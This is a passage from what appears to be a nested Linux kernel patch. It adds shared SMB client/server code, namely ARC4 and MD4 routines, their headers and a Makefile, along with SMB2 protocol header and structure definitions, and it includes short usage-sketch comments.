++	&cifs_cifs_ntsd_full_xattr_handler,
++	&smb3_ntsd_full_xattr_handler, /* alias for above since avoiding "cifs" */
++	&cifs_posix_acl_access_xattr_handler,
++	&cifs_posix_acl_default_xattr_handler,
++	NULL
++};
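++
++/*
++ * From userspace the pseudo-attributes above look like ordinary xattrs.
++ * A minimal sketch (hypothetical path) of reading the DOS attribute bits
++ * that cifs_attrib_get() returns, via getxattr(2):
++ *
++ *	uint32_t attrib;
++ *
++ *	if (getxattr("/mnt/share/file", "user.cifs.dosattrib",
++ *		     &attrib, sizeof(attrib)) == sizeof(attrib))
++ *		printf("DOS attributes: 0x%08x\n", attrib);
++ */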
+diff --git a/fs/smb/common/Makefile b/fs/smb/common/Makefile
+new file mode 100644
+index 0000000000000..c66dbbc1469c3
+--- /dev/null
++++ b/fs/smb/common/Makefile
+@@ -0,0 +1,7 @@
++# SPDX-License-Identifier: GPL-2.0-only
++#
++# Makefile for Linux filesystem routines that are shared by client and server.
++#
++
++obj-$(CONFIG_SMBFS) += cifs_arc4.o
++obj-$(CONFIG_SMBFS) += cifs_md4.o
+diff --git a/fs/smb/common/arc4.h b/fs/smb/common/arc4.h
+new file mode 100644
+index 0000000000000..12e71ec033a18
+--- /dev/null
++++ b/fs/smb/common/arc4.h
+@@ -0,0 +1,23 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++/*
++ * Common values for ARC4 Cipher Algorithm
++ */
++
++#ifndef _CRYPTO_ARC4_H
++#define _CRYPTO_ARC4_H
++
++#include <linux/types.h>
++
++#define ARC4_MIN_KEY_SIZE	1
++#define ARC4_MAX_KEY_SIZE	256
++#define ARC4_BLOCK_SIZE		1
++
++struct arc4_ctx {
++	u32 S[256];
++	u32 x, y;
++};
++
++int cifs_arc4_setkey(struct arc4_ctx *ctx, const u8 *in_key, unsigned int key_len);
++void cifs_arc4_crypt(struct arc4_ctx *ctx, u8 *out, const u8 *in, unsigned int len);
++
++#endif /* _CRYPTO_ARC4_H */
+diff --git a/fs/smb/common/cifs_arc4.c b/fs/smb/common/cifs_arc4.c
+new file mode 100644
+index 0000000000000..043e4cb839fa2
+--- /dev/null
++++ b/fs/smb/common/cifs_arc4.c
+@@ -0,0 +1,74 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * Cryptographic API
++ *
++ * ARC4 Cipher Algorithm
++ *
++ * Jon Oberheide <jon@oberheide.org>
++ */
++
++#include <linux/module.h>
++#include "arc4.h"
++
++MODULE_LICENSE("GPL");
++
++int cifs_arc4_setkey(struct arc4_ctx *ctx, const u8 *in_key, unsigned int key_len)
++{
++	int i, j = 0, k = 0;
++
++	ctx->x = 1;
++	ctx->y = 0;
++
++	for (i = 0; i < 256; i++)
++		ctx->S[i] = i;
++
++	for (i = 0; i < 256; i++) {
++		u32 a = ctx->S[i];
++
++		j = (j + in_key[k] + a) & 0xff;
++		ctx->S[i] = ctx->S[j];
++		ctx->S[j] = a;
++		if (++k >= key_len)
++			k = 0;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cifs_arc4_setkey);
++
++void cifs_arc4_crypt(struct arc4_ctx *ctx, u8 *out, const u8 *in, unsigned int len)
++{
++	u32 *const S = ctx->S;
++	u32 x, y, a, b;
++	u32 ty, ta, tb;
++
++	if (len == 0)
++		return;
++
++	x = ctx->x;
++	y = ctx->y;
++
++	a = S[x];
++	y = (y + a) & 0xff;
++	b = S[y];
++
++	do {
++		S[y] = a;
++		a = (a + b) & 0xff;
++		S[x] = b;
++		x = (x + 1) & 0xff;
++		ta = S[x];
++		ty = (y + ta) & 0xff;
++		tb = S[ty];
++		*out++ = *in++ ^ S[a];
++		if (--len == 0)
++			break;
++		y = ty;
++		a = ta;
++		b = tb;
++	} while (true);
++
++	ctx->x = x;
++	ctx->y = y;
++}
++EXPORT_SYMBOL_GPL(cifs_arc4_crypt);
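++
++/*
++ * Minimal usage sketch of the two exports above (key and buffer names are
++ * illustrative; real callers derive the key from session state).  ARC4 is
++ * a symmetric stream cipher, so decryption is the same call sequence with
++ * a freshly keyed context; out may alias in for in-place operation:
++ *
++ *	struct arc4_ctx ctx;
++ *
++ *	cifs_arc4_setkey(&ctx, key, key_len);
++ *	cifs_arc4_crypt(&ctx, buf, buf, len);
++ */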
+diff --git a/fs/smb/common/cifs_md4.c b/fs/smb/common/cifs_md4.c
+new file mode 100644
+index 0000000000000..50f78cfc6ce92
+--- /dev/null
++++ b/fs/smb/common/cifs_md4.c
+@@ -0,0 +1,197 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Cryptographic API.
++ *
++ * MD4 Message Digest Algorithm (RFC1320).
++ *
++ * Implementation derived from Andrew Tridgell and Steve French's
++ * CIFS MD4 implementation, and the cryptoapi implementation
++ * originally based on the public domain implementation written
++ * by Colin Plumb in 1993.
++ *
++ * Copyright (c) Andrew Tridgell 1997-1998.
++ * Modified by Steve French (sfrench@us.ibm.com) 2002
++ * Copyright (c) Cryptoapi developers.
++ * Copyright (c) 2002 David S. Miller (davem@redhat.com)
++ * Copyright (c) 2002 James Morris <jmorris@intercode.com.au>
++ *
++ */
++#include <linux/init.h>
++#include <linux/kernel.h>
++#include <linux/module.h>
++#include <linux/string.h>
++#include <linux/types.h>
++#include <asm/byteorder.h>
++#include "md4.h"
++
++MODULE_LICENSE("GPL");
++
++static inline u32 lshift(u32 x, unsigned int s)
++{
++	x &= 0xFFFFFFFF;
++	return ((x << s) & 0xFFFFFFFF) | (x >> (32 - s));
++}
++
++static inline u32 F(u32 x, u32 y, u32 z)
++{
++	return (x & y) | ((~x) & z);
++}
++
++static inline u32 G(u32 x, u32 y, u32 z)
++{
++	return (x & y) | (x & z) | (y & z);
++}
++
++static inline u32 H(u32 x, u32 y, u32 z)
++{
++	return x ^ y ^ z;
++}
++
++#define ROUND1(a,b,c,d,k,s) (a = lshift(a + F(b,c,d) + k, s))
++#define ROUND2(a,b,c,d,k,s) (a = lshift(a + G(b,c,d) + k + (u32)0x5A827999,s))
++#define ROUND3(a,b,c,d,k,s) (a = lshift(a + H(b,c,d) + k + (u32)0x6ED9EBA1,s))
++
++static void md4_transform(u32 *hash, u32 const *in)
++{
++	u32 a, b, c, d;
++
++	a = hash[0];
++	b = hash[1];
++	c = hash[2];
++	d = hash[3];
++
++	ROUND1(a, b, c, d, in[0], 3);
++	ROUND1(d, a, b, c, in[1], 7);
++	ROUND1(c, d, a, b, in[2], 11);
++	ROUND1(b, c, d, a, in[3], 19);
++	ROUND1(a, b, c, d, in[4], 3);
++	ROUND1(d, a, b, c, in[5], 7);
++	ROUND1(c, d, a, b, in[6], 11);
++	ROUND1(b, c, d, a, in[7], 19);
++	ROUND1(a, b, c, d, in[8], 3);
++	ROUND1(d, a, b, c, in[9], 7);
++	ROUND1(c, d, a, b, in[10], 11);
++	ROUND1(b, c, d, a, in[11], 19);
++	ROUND1(a, b, c, d, in[12], 3);
++	ROUND1(d, a, b, c, in[13], 7);
++	ROUND1(c, d, a, b, in[14], 11);
++	ROUND1(b, c, d, a, in[15], 19);
++
++	ROUND2(a, b, c, d, in[0], 3);
++	ROUND2(d, a, b, c, in[4], 5);
++	ROUND2(c, d, a, b, in[8], 9);
++	ROUND2(b, c, d, a, in[12], 13);
++	ROUND2(a, b, c, d, in[1], 3);
++	ROUND2(d, a, b, c, in[5], 5);
++	ROUND2(c, d, a, b, in[9], 9);
++	ROUND2(b, c, d, a, in[13], 13);
++	ROUND2(a, b, c, d, in[2], 3);
++	ROUND2(d, a, b, c, in[6], 5);
++	ROUND2(c, d, a, b, in[10], 9);
++	ROUND2(b, c, d, a, in[14], 13);
++	ROUND2(a, b, c, d, in[3], 3);
++	ROUND2(d, a, b, c, in[7], 5);
++	ROUND2(c, d, a, b, in[11], 9);
++	ROUND2(b, c, d, a, in[15], 13);
++
++	ROUND3(a, b, c, d, in[0], 3);
++	ROUND3(d, a, b, c, in[8], 9);
++	ROUND3(c, d, a, b, in[4], 11);
++	ROUND3(b, c, d, a, in[12], 15);
++	ROUND3(a, b, c, d, in[2], 3);
++	ROUND3(d, a, b, c, in[10], 9);
++	ROUND3(c, d, a, b, in[6], 11);
++	ROUND3(b, c, d, a, in[14], 15);
++	ROUND3(a, b, c, d, in[1], 3);
++	ROUND3(d, a, b, c, in[9], 9);
++	ROUND3(c, d, a, b, in[5], 11);
++	ROUND3(b, c, d, a, in[13], 15);
++	ROUND3(a, b, c, d, in[3], 3);
++	ROUND3(d, a, b, c, in[11], 9);
++	ROUND3(c, d, a, b, in[7], 11);
++	ROUND3(b, c, d, a, in[15], 15);
++
++	hash[0] += a;
++	hash[1] += b;
++	hash[2] += c;
++	hash[3] += d;
++}
++
++static inline void md4_transform_helper(struct md4_ctx *ctx)
++{
++	le32_to_cpu_array(ctx->block, ARRAY_SIZE(ctx->block));
++	md4_transform(ctx->hash, ctx->block);
++}
++
++int cifs_md4_init(struct md4_ctx *mctx)
++{
++	memset(mctx, 0, sizeof(struct md4_ctx));
++	mctx->hash[0] = 0x67452301;
++	mctx->hash[1] = 0xefcdab89;
++	mctx->hash[2] = 0x98badcfe;
++	mctx->hash[3] = 0x10325476;
++	mctx->byte_count = 0;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cifs_md4_init);
++
++int cifs_md4_update(struct md4_ctx *mctx, const u8 *data, unsigned int len)
++{
++	const u32 avail = sizeof(mctx->block) - (mctx->byte_count & 0x3f);
++
++	mctx->byte_count += len;
++
++	if (avail > len) {
++		memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
++		       data, len);
++		return 0;
++	}
++
++	memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
++	       data, avail);
++
++	md4_transform_helper(mctx);
++	data += avail;
++	len -= avail;
++
++	while (len >= sizeof(mctx->block)) {
++		memcpy(mctx->block, data, sizeof(mctx->block));
++		md4_transform_helper(mctx);
++		data += sizeof(mctx->block);
++		len -= sizeof(mctx->block);
++	}
++
++	memcpy(mctx->block, data, len);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cifs_md4_update);
++
++int cifs_md4_final(struct md4_ctx *mctx, u8 *out)
++{
++	const unsigned int offset = mctx->byte_count & 0x3f;
++	char *p = (char *)mctx->block + offset;
++	int padding = 56 - (offset + 1);
++
++	*p++ = 0x80;
++	if (padding < 0) {
++		memset(p, 0x00, padding + sizeof(u64));
++		md4_transform_helper(mctx);
++		p = (char *)mctx->block;
++		padding = 56;
++	}
++
++	memset(p, 0, padding);
++	mctx->block[14] = mctx->byte_count << 3;
++	mctx->block[15] = mctx->byte_count >> 29;
++	le32_to_cpu_array(mctx->block, (sizeof(mctx->block) -
++			  sizeof(u64)) / sizeof(u32));
++	md4_transform(mctx->hash, mctx->block);
++	cpu_to_le32_array(mctx->hash, ARRAY_SIZE(mctx->hash));
++	memcpy(out, mctx->hash, sizeof(mctx->hash));
++	memset(mctx, 0, sizeof(*mctx));
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cifs_md4_final);
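++
++/*
++ * The exports above follow the usual init/update/final pattern.  Minimal
++ * usage sketch (data and len are illustrative):
++ *
++ *	struct md4_ctx ctx;
++ *	u8 digest[MD4_DIGEST_SIZE];
++ *
++ *	cifs_md4_init(&ctx);
++ *	cifs_md4_update(&ctx, data, len);
++ *	cifs_md4_final(&ctx, digest);
++ *
++ * cifs_md4_final() copies out the 16-byte digest and then wipes the
++ * context.
++ */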
+diff --git a/fs/smb/common/md4.h b/fs/smb/common/md4.h
+new file mode 100644
+index 0000000000000..5337becc699ab
+--- /dev/null
++++ b/fs/smb/common/md4.h
+@@ -0,0 +1,27 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++/*
++ * Common values for the MD4 Message Digest Algorithm (RFC 1320)
++ */
++
++#ifndef _CIFS_MD4_H
++#define _CIFS_MD4_H
++
++#include <linux/types.h>
++
++#define MD4_DIGEST_SIZE		16
++#define MD4_HMAC_BLOCK_SIZE	64
++#define MD4_BLOCK_WORDS		16
++#define MD4_HASH_WORDS		4
++
++struct md4_ctx {
++	u32 hash[MD4_HASH_WORDS];
++	u32 block[MD4_BLOCK_WORDS];
++	u64 byte_count;
++};
++
++int cifs_md4_init(struct md4_ctx *mctx);
++int cifs_md4_update(struct md4_ctx *mctx, const u8 *data, unsigned int len);
++int cifs_md4_final(struct md4_ctx *mctx, u8 *out);
++
++#endif /* _CIFS_MD4_H */
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+new file mode 100644
+index 0000000000000..7d605db3bb3b9
+--- /dev/null
++++ b/fs/smb/common/smb2pdu.h
+@@ -0,0 +1,1702 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++#ifndef _COMMON_SMB2PDU_H
++#define _COMMON_SMB2PDU_H
++
++/*
++ * Note that, due to trying to use names similar to the protocol specifications,
++ * there are many mixed case field names in the structures below.  Although
++ * this does not match typical Linux kernel style, it is necessary to be
++ * able to match against the protocol specification.
++ *
++ * SMB2 commands
++ * Some commands have minimal (wct=0,bcc=0), or uninteresting, responses
++ * (ie no useful data other than the SMB error code itself) and are marked such.
++ * Knowing this helps avoid response buffer allocations and copy in some cases.
++ */
++
++/* List of commands in host endian */
++#define SMB2_NEGOTIATE_HE	0x0000
++#define SMB2_SESSION_SETUP_HE	0x0001
++#define SMB2_LOGOFF_HE		0x0002 /* trivial request/resp */
++#define SMB2_TREE_CONNECT_HE	0x0003
++#define SMB2_TREE_DISCONNECT_HE	0x0004 /* trivial req/resp */
++#define SMB2_CREATE_HE		0x0005
++#define SMB2_CLOSE_HE		0x0006
++#define SMB2_FLUSH_HE		0x0007 /* trivial resp */
++#define SMB2_READ_HE		0x0008
++#define SMB2_WRITE_HE		0x0009
++#define SMB2_LOCK_HE		0x000A
++#define SMB2_IOCTL_HE		0x000B
++#define SMB2_CANCEL_HE		0x000C
++#define SMB2_ECHO_HE		0x000D
++#define SMB2_QUERY_DIRECTORY_HE	0x000E
++#define SMB2_CHANGE_NOTIFY_HE	0x000F
++#define SMB2_QUERY_INFO_HE	0x0010
++#define SMB2_SET_INFO_HE	0x0011
++#define SMB2_OPLOCK_BREAK_HE	0x0012
++
++/* The same list in little endian */
++#define SMB2_NEGOTIATE		cpu_to_le16(SMB2_NEGOTIATE_HE)
++#define SMB2_SESSION_SETUP	cpu_to_le16(SMB2_SESSION_SETUP_HE)
++#define SMB2_LOGOFF		cpu_to_le16(SMB2_LOGOFF_HE)
++#define SMB2_TREE_CONNECT	cpu_to_le16(SMB2_TREE_CONNECT_HE)
++#define SMB2_TREE_DISCONNECT	cpu_to_le16(SMB2_TREE_DISCONNECT_HE)
++#define SMB2_CREATE		cpu_to_le16(SMB2_CREATE_HE)
++#define SMB2_CLOSE		cpu_to_le16(SMB2_CLOSE_HE)
++#define SMB2_FLUSH		cpu_to_le16(SMB2_FLUSH_HE)
++#define SMB2_READ		cpu_to_le16(SMB2_READ_HE)
++#define SMB2_WRITE		cpu_to_le16(SMB2_WRITE_HE)
++#define SMB2_LOCK		cpu_to_le16(SMB2_LOCK_HE)
++#define SMB2_IOCTL		cpu_to_le16(SMB2_IOCTL_HE)
++#define SMB2_CANCEL		cpu_to_le16(SMB2_CANCEL_HE)
++#define SMB2_ECHO		cpu_to_le16(SMB2_ECHO_HE)
++#define SMB2_QUERY_DIRECTORY	cpu_to_le16(SMB2_QUERY_DIRECTORY_HE)
++#define SMB2_CHANGE_NOTIFY	cpu_to_le16(SMB2_CHANGE_NOTIFY_HE)
++#define SMB2_QUERY_INFO		cpu_to_le16(SMB2_QUERY_INFO_HE)
++#define SMB2_SET_INFO		cpu_to_le16(SMB2_SET_INFO_HE)
++#define SMB2_OPLOCK_BREAK	cpu_to_le16(SMB2_OPLOCK_BREAK_HE)
++
++#define SMB2_INTERNAL_CMD	cpu_to_le16(0xFFFF)
++
++#define NUMBER_OF_SMB2_COMMANDS	0x0013
++
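++/*
++ * Commands arrive on the wire little-endian; a dispatcher typically
++ * converts once and range-checks against the host-endian count (a minimal
++ * sketch, assuming shdr points at a received struct smb2_hdr):
++ *
++ *	u16 cmd = le16_to_cpu(shdr->Command);
++ *
++ *	if (cmd >= NUMBER_OF_SMB2_COMMANDS)
++ *		return -EINVAL;
++ */
++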
++/*
++ * Size of the session key (crypto key encrypted with the password)
++ */
++#define SMB2_NTLMV2_SESSKEY_SIZE	16
++#define SMB2_SIGNATURE_SIZE		16
++#define SMB2_HMACSHA256_SIZE		32
++#define SMB2_CMACAES_SIZE		16
++#define SMB3_GCM128_CRYPTKEY_SIZE	16
++#define SMB3_GCM256_CRYPTKEY_SIZE	32
++
++/*
++ * Size of the smb3 encryption/decryption keys
++ * This size is big enough to store any cipher key types.
++ */
++#define SMB3_ENC_DEC_KEY_SIZE		32
++
++/*
++ * Size of the smb3 signing key
++ */
++#define SMB3_SIGN_KEY_SIZE		16
++
++#define CIFS_CLIENT_CHALLENGE_SIZE	8
++
++/* Maximum buffer size value we can send with 1 credit */
++#define SMB2_MAX_BUFFER_SIZE 65536
++
++/*
++ * The default wsize is 1M for SMB2 (and for some CIFS cases).
++ * find_get_pages seems to return a maximum of 256 pages in a single call.
++ * With PAGE_SIZE == 4k, 256 * 4k = 1M, so a single 1M wsize request can be
++ * filled with a single call.
++ */
++#define SMB3_DEFAULT_IOSIZE (4 * 1024 * 1024)
++
++/*
++ * SMB2 Header Definition
++ *
++ * "MBZ" :  Must be Zero
++ * "BB"  :  BugBug, Something to check/review/analyze later
++ * "PDU" :  "Protocol Data Unit" (ie a network "frame")
++ *
++ */
++
++#define __SMB2_HEADER_STRUCTURE_SIZE	64
++#define SMB2_HEADER_STRUCTURE_SIZE				\
++	cpu_to_le16(__SMB2_HEADER_STRUCTURE_SIZE)
++
++#define SMB2_PROTO_NUMBER cpu_to_le32(0x424d53fe)
++#define SMB2_TRANSFORM_PROTO_NUM cpu_to_le32(0x424d53fd)
++#define SMB2_COMPRESSION_TRANSFORM_ID cpu_to_le32(0x424d53fc)
++
++/*
++ *	SMB2 flag definitions
++ */
++#define SMB2_FLAGS_SERVER_TO_REDIR	cpu_to_le32(0x00000001)
++#define SMB2_FLAGS_ASYNC_COMMAND	cpu_to_le32(0x00000002)
++#define SMB2_FLAGS_RELATED_OPERATIONS	cpu_to_le32(0x00000004)
++#define SMB2_FLAGS_SIGNED		cpu_to_le32(0x00000008)
++#define SMB2_FLAGS_PRIORITY_MASK	cpu_to_le32(0x00000070) /* SMB3.1.1 */
++#define SMB2_FLAGS_DFS_OPERATIONS	cpu_to_le32(0x10000000)
++#define SMB2_FLAGS_REPLAY_OPERATION	cpu_to_le32(0x20000000) /* SMB3 & up */
++
++/*
++ *	Definitions for SMB2 Protocol Data Units (network frames)
++ *
++ *  See MS-SMB2.PDF specification for protocol details.
++ *  The naming convention is the lower case version of the SMB2
++ *  command code name for the struct. Note that structures must be packed.
++ *
++ */
++
++/* See MS-SMB2 section 2.2.1 */
++struct smb2_hdr {
++	__le32 ProtocolId;	/* 0xFE 'S' 'M' 'B' */
++	__le16 StructureSize;	/* 64 */
++	__le16 CreditCharge;	/* MBZ */
++	__le32 Status;		/* Error from server */
++	__le16 Command;
++	__le16 CreditRequest;	/* CreditResponse */
++	__le32 Flags;
++	__le32 NextCommand;
++	__le64 MessageId;
++	union {
++		struct {
++			__le32 ProcessId;
++			__le32  TreeId;
++		} __packed SyncId;
++		__le64  AsyncId;
++	} __packed Id;
++	__le64  SessionId;
++	__u8   Signature[16];
++} __packed;
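++
++/*
++ * The header above must pack to exactly 64 bytes to match StructureSize.
++ * A compile-time sketch of that invariant (assuming static_assert() from
++ * <linux/build_bug.h>):
++ *
++ *	static_assert(sizeof(struct smb2_hdr) == __SMB2_HEADER_STRUCTURE_SIZE);
++ */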
++
++struct smb2_pdu {
++	struct smb2_hdr hdr;
++	__le16 StructureSize2; /* size of wct area (varies, request specific) */
++} __packed;
++
++#define SMB2_ERROR_STRUCTURE_SIZE2	9
++#define SMB2_ERROR_STRUCTURE_SIZE2_LE	cpu_to_le16(SMB2_ERROR_STRUCTURE_SIZE2)
++
++struct smb2_err_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;
++	__u8   ErrorContextCount;
++	__u8   Reserved;
++	__le32 ByteCount;  /* even if zero, at least one byte follows */
++	__u8   ErrorData[1];  /* variable length */
++} __packed;
++
++#define SMB3_AES_CCM_NONCE 11
++#define SMB3_AES_GCM_NONCE 12
++
++/* Transform flags (for 3.0 dialect this flag indicates CCM) */
++#define TRANSFORM_FLAG_ENCRYPTED	0x0001
++struct smb2_transform_hdr {
++	__le32 ProtocolId;	/* 0xFD 'S' 'M' 'B' */
++	__u8   Signature[16];
++	__u8   Nonce[16];
++	__le32 OriginalMessageSize;
++	__u16  Reserved1;
++	__le16 Flags; /* EncryptionAlgorithm for 3.0, enc enabled for 3.1.1 */
++	__le64  SessionId;
++} __packed;
++
++/* See MS-SMB2 2.2.42 */
++struct smb2_compression_transform_hdr_unchained {
++	__le32 ProtocolId;	/* 0xFC 'S' 'M' 'B' */
++	__le32 OriginalCompressedSegmentSize;
++	__le16 CompressionAlgorithm;
++	__le16 Flags;
++	__le16 Length; /* if chained it is length, else offset */
++} __packed;
++
++/* See MS-SMB2 2.2.42.1 */
++#define SMB2_COMPRESSION_FLAG_NONE	0x0000
++#define SMB2_COMPRESSION_FLAG_CHAINED	0x0001
++
++struct compression_payload_header {
++	__le16	CompressionAlgorithm;
++	__le16	Flags;
++	__le32	Length; /* length of compressed payload including field below if present */
++	/* __le32 OriginalPayloadSize; */ /* optional, present when LZNT1, LZ77, LZ77+Huffman */
++} __packed;
++
++/* See MS-SMB2 2.2.42.2 */
++struct smb2_compression_transform_hdr_chained {
++	__le32 ProtocolId;	/* 0xFC 'S' 'M' 'B' */
++	__le32 OriginalCompressedSegmentSize;
++	/* struct compression_payload_header[] */
++} __packed;
++
++/* See MS-SMB2 2.2.42.2.2 */
++struct compression_pattern_payload_v1 {
++	__le16	Pattern;
++	__le16	Reserved1;
++	__le16	Reserved2;
++	__le32	Repetitions;
++} __packed;
++
++/* See MS-SMB2 section 2.2.9.2 */
++/* Context Types */
++#define SMB2_RESERVED_TREE_CONNECT_CONTEXT_ID 0x0000
++#define SMB2_REMOTED_IDENTITY_TREE_CONNECT_CONTEXT_ID cpu_to_le16(0x0001)
++
++struct tree_connect_contexts {
++	__le16 ContextType;
++	__le16 DataLength;
++	__le32 Reserved;
++	__u8   Data[];
++} __packed;
++
++/* Remoted identity tree connect context structures - see MS-SMB2 2.2.9.2.1 */
++struct smb3_blob_data {
++	__le16 BlobSize;
++	__u8   BlobData[];
++} __packed;
++
++/* Valid values for Attr */
++#define SE_GROUP_MANDATORY		0x00000001
++#define SE_GROUP_ENABLED_BY_DEFAULT	0x00000002
++#define SE_GROUP_ENABLED		0x00000004
++#define SE_GROUP_OWNER			0x00000008
++#define SE_GROUP_USE_FOR_DENY_ONLY	0x00000010
++#define SE_GROUP_INTEGRITY		0x00000020
++#define SE_GROUP_INTEGRITY_ENABLED	0x00000040
++#define SE_GROUP_RESOURCE		0x20000000
++#define SE_GROUP_LOGON_ID		0xC0000000
++
++/* struct sid_attr_data is SidData array in BlobData format then le32 Attr */
++
++struct sid_array_data {
++	__le16 SidAttrCount;
++	/* SidAttrList - array of sid_attr_data structs */
++} __packed;
++
++struct luid_attr_data {
++
++} __packed;
++
++/*
++ * struct privilege_data is the same as BLOB_DATA - see MS-SMB2 2.2.9.2.1.5
++ * but with size of LUID_ATTR_DATA struct and BlobData set to LUID_ATTR_DATA
++ */
++
++struct privilege_array_data {
++	__le16 PrivilegeCount;
++	/* array of privilege_data structs */
++} __packed;
++
++struct remoted_identity_tcon_context {
++	__le16 TicketType; /* must be 0x0001 */
++	__le16 TicketSize; /* total size of this struct */
++	__le16 User; /* offset to SID_ATTR_DATA struct with user info */
++	__le16 UserName; /* offset to null terminated Unicode username string */
++	__le16 Domain; /* offset to null terminated Unicode domain name */
++	__le16 Groups; /* offset to SID_ARRAY_DATA struct with group info */
++	__le16 RestrictedGroups; /* similar to above */
++	__le16 Privileges; /* offset to PRIVILEGE_ARRAY_DATA struct */
++	__le16 PrimaryGroup; /* offset to SID_ARRAY_DATA struct */
++	__le16 Owner; /* offset to BLOB_DATA struct */
++	__le16 DefaultDacl; /* offset to BLOB_DATA struct */
++	__le16 DeviceGroups; /* offset to SID_ARRAY_DATA struct */
++	__le16 UserClaims; /* offset to BLOB_DATA struct */
++	__le16 DeviceClaims; /* offset to BLOB_DATA struct */
++	__u8   TicketInfo[]; /* variable length buf - remoted identity data */
++} __packed;
++
++struct smb2_tree_connect_req_extension {
++	__le32 TreeConnectContextOffset;
++	__le16 TreeConnectContextCount;
++	__u8  Reserved[10];
++	__u8  PathName[]; /* variable sized array */
++	/* followed by array of TreeConnectContexts */
++} __packed;
++
++/* Flags/Reserved for SMB3.1.1 */
++#define SMB2_TREE_CONNECT_FLAG_CLUSTER_RECONNECT cpu_to_le16(0x0001)
++#define SMB2_TREE_CONNECT_FLAG_REDIRECT_TO_OWNER cpu_to_le16(0x0002)
++#define SMB2_TREE_CONNECT_FLAG_EXTENSION_PRESENT cpu_to_le16(0x0004)
++
++struct smb2_tree_connect_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 9 */
++	__le16 Flags;		/* Flags in SMB3.1.1 */
++	__le16 PathOffset;
++	__le16 PathLength;
++	__u8   Buffer[1];	/* variable length */
++} __packed;
++
++/* Possible ShareType values */
++#define SMB2_SHARE_TYPE_DISK	0x01
++#define SMB2_SHARE_TYPE_PIPE	0x02
++#define	SMB2_SHARE_TYPE_PRINT	0x03
++
++/*
++ * Possible ShareFlags - exactly one of the first 4 caching flags must be
++ * set (any of the remaining, SHI1005, flags may be set individually or in
++ * combination).
++ */
++#define SMB2_SHAREFLAG_MANUAL_CACHING			0x00000000
++#define SMB2_SHAREFLAG_AUTO_CACHING			0x00000010
++#define SMB2_SHAREFLAG_VDO_CACHING			0x00000020
++#define SMB2_SHAREFLAG_NO_CACHING			0x00000030
++#define SHI1005_FLAGS_DFS				0x00000001
++#define SHI1005_FLAGS_DFS_ROOT				0x00000002
++#define SHI1005_FLAGS_RESTRICT_EXCLUSIVE_OPENS		0x00000100
++#define SHI1005_FLAGS_FORCE_SHARED_DELETE		0x00000200
++#define SHI1005_FLAGS_ALLOW_NAMESPACE_CACHING		0x00000400
++#define SHI1005_FLAGS_ACCESS_BASED_DIRECTORY_ENUM	0x00000800
++#define SHI1005_FLAGS_FORCE_LEVELII_OPLOCK		0x00001000
++#define SHI1005_FLAGS_ENABLE_HASH_V1			0x00002000
++#define SHI1005_FLAGS_ENABLE_HASH_V2			0x00004000
++#define SHI1005_FLAGS_ENCRYPT_DATA			0x00008000
++#define SMB2_SHAREFLAG_IDENTITY_REMOTING		0x00040000 /* 3.1.1 */
++#define SMB2_SHAREFLAG_COMPRESS_DATA			0x00100000 /* 3.1.1 */
++#define SHI1005_FLAGS_ALL				0x0014FF33
++
++/* Possible share capabilities */
++#define SMB2_SHARE_CAP_DFS	cpu_to_le32(0x00000008) /* all dialects */
++#define SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY cpu_to_le32(0x00000010) /* 3.0 */
++#define SMB2_SHARE_CAP_SCALEOUT	cpu_to_le32(0x00000020) /* 3.0 */
++#define SMB2_SHARE_CAP_CLUSTER	cpu_to_le32(0x00000040) /* 3.0 */
++#define SMB2_SHARE_CAP_ASYMMETRIC cpu_to_le32(0x00000080) /* 3.02 */
++#define SMB2_SHARE_CAP_REDIRECT_TO_OWNER cpu_to_le32(0x00000100) /* 3.1.1 */
++
++struct smb2_tree_connect_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 16 */
++	__u8   ShareType;	/* see below */
++	__u8   Reserved;
++	__le32 ShareFlags;	/* see below */
++	__le32 Capabilities;	/* see below */
++	__le32 MaximalAccess;
++} __packed;
++
++struct smb2_tree_disconnect_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++struct smb2_tree_disconnect_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++/*
++ * SMB2_NEGOTIATE_PROTOCOL  See MS-SMB2 section 2.2.3
++ */
++/* SecurityMode flags */
++#define	SMB2_NEGOTIATE_SIGNING_ENABLED     0x0001
++#define	SMB2_NEGOTIATE_SIGNING_ENABLED_LE  cpu_to_le16(0x0001)
++#define SMB2_NEGOTIATE_SIGNING_REQUIRED	   0x0002
++#define SMB2_NEGOTIATE_SIGNING_REQUIRED_LE cpu_to_le16(0x0002)
++#define SMB2_SEC_MODE_FLAGS_ALL            0x0003
++
++/* Capabilities flags */
++#define SMB2_GLOBAL_CAP_DFS		0x00000001
++#define SMB2_GLOBAL_CAP_LEASING		0x00000002 /* Resp only New to SMB2.1 */
++#define SMB2_GLOBAL_CAP_LARGE_MTU	0x00000004 /* Resp only New to SMB2.1 */
++#define SMB2_GLOBAL_CAP_MULTI_CHANNEL	0x00000008 /* New to SMB3 */
++#define SMB2_GLOBAL_CAP_PERSISTENT_HANDLES 0x00000010 /* New to SMB3 */
++#define SMB2_GLOBAL_CAP_DIRECTORY_LEASING  0x00000020 /* New to SMB3 */
++#define SMB2_GLOBAL_CAP_ENCRYPTION	0x00000040 /* New to SMB3 */
++/* Internal types */
++#define SMB2_NT_FIND			0x00100000
++#define SMB2_LARGE_FILES		0x00200000
++
++#define SMB2_CLIENT_GUID_SIZE		16
++#define SMB2_CREATE_GUID_SIZE		16
++
++/* Dialects */
++#define SMB10_PROT_ID  0x0000 /* local only, not sent on wire w/CIFS negprot */
